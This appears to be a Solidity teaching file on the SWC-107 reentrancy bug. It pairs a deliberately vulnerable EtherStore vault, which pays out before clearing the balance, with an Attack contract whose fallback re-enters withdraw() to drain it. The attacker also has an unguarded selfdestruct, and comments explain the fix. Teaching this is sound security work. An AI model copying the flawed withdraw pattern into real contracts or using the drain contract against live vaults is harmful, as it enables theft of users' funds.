SWC-107 : Reentrancy / CWE-841: Improper Enforcement of Behavioral Workflow from KBTG Inspire2
pragma solidity ^0.8.0; | |
/// @title EtherStore - deliberately vulnerable vault illustrating SWC-107 (reentrancy).
/// @notice Teaching example only; do not deploy. withdraw() makes its external call
///         before it clears the caller's recorded balance, so a contract caller can
///         re-enter withdraw() while that balance is still non-zero.
/// @dev Mitigation: apply checks-effects-interactions (set balances[msg.sender] = 0
///      before the call) and/or put a reentrancy guard on withdraw().
contract EtherStore {
    /// @notice Ether credited to each depositor, in wei.
    mapping(address => uint256) public balances;

    /// @notice Credit the attached Ether to the caller's balance.
    function deposit() public payable {
        balances[msg.sender] = balances[msg.sender] + msg.value;
    }

    /// @notice Send the caller their entire recorded balance.
    /// @dev Reverts with "Not enough Ether" when the caller has no balance and with
    ///      "Failed to send Ether" when the transfer call reports failure.
    function withdraw() public {
        uint256 owed = balances[msg.sender];
        require(owed != 0, "Not enough Ether");

        // INTERACTION before EFFECT: this ordering is the defect being demonstrated.
        // A low-level call forwards all remaining gas, so a contract recipient's
        // fallback runs here with balances[msg.sender] still equal to `owed`.
        (bool ok, ) = payable(msg.sender).call{value: owed}("");
        require(ok, "Failed to send Ether");

        // The balance is cleared only after control returns from the recipient.
        // Because this is an assignment rather than a subtraction, Solidity 0.8's
        // checked arithmetic does not catch the repeated payout.
        balances[msg.sender] = 0;
    }

    /// @notice Total Ether currently held by this contract, in wei.
    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
/// @title Attack - proof-of-concept caller showing why EtherStore.withdraw() is unsafe.
/// @notice Exists to make the SWC-107 ordering bug observable in a test environment.
///         In a transaction trace the symptom is nested withdraw() frames for the same
///         caller inside one transaction, each paying out the same recorded balance.
/// @dev Once EtherStore clears the balance before its external call, the nested
///      withdraw() hits the "Not enough Ether" require and the whole call reverts.
contract Attack {
    /// @notice The EtherStore instance this contract interacts with.
    EtherStore public etherStore;

    /// @param _etherStoreAddress Address of the deployed EtherStore.
    /// @dev Compilers from 0.7.0 on ignore constructor visibility and warn about it.
    constructor(address _etherStoreAddress) public {
        etherStore = EtherStore(_etherStoreAddress);
    }

    /// @dev Runs when EtherStore.withdraw() sends Ether here. It calls withdraw()
    ///      again while this contract's recorded balance has not yet been zeroed.
    fallback() external payable {
        // Stop once the store holds less than 1 Ether.
        if (address(etherStore).balance < 1 ether) {
            return;
        }
        etherStore.withdraw();
    }

    /// @notice Deposit 1 Ether into the store, then start the first withdraw().
    /// @dev Requires msg.value >= 1 ether but forwards exactly 1 ether; any excess
    ///      stays in this contract.
    function attack() external payable {
        require(msg.value >= 1 ether, "require at least 1 Eth");
        etherStore.deposit{value: 1 ether}();
        etherStore.withdraw();
    }

    /// @notice Ether currently held by this contract, in wei.
    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }

    /// @notice Destroy this contract and send its Ether to the caller.
    /// @dev NOTE(review): there is no access control, so any account can call this
    ///      and receive the balance (compare SWC-106). selfdestruct is also
    ///      deprecated in newer 0.8.x compilers.
    function kill() external payable {
        selfdestruct(payable(msg.sender));
    }
}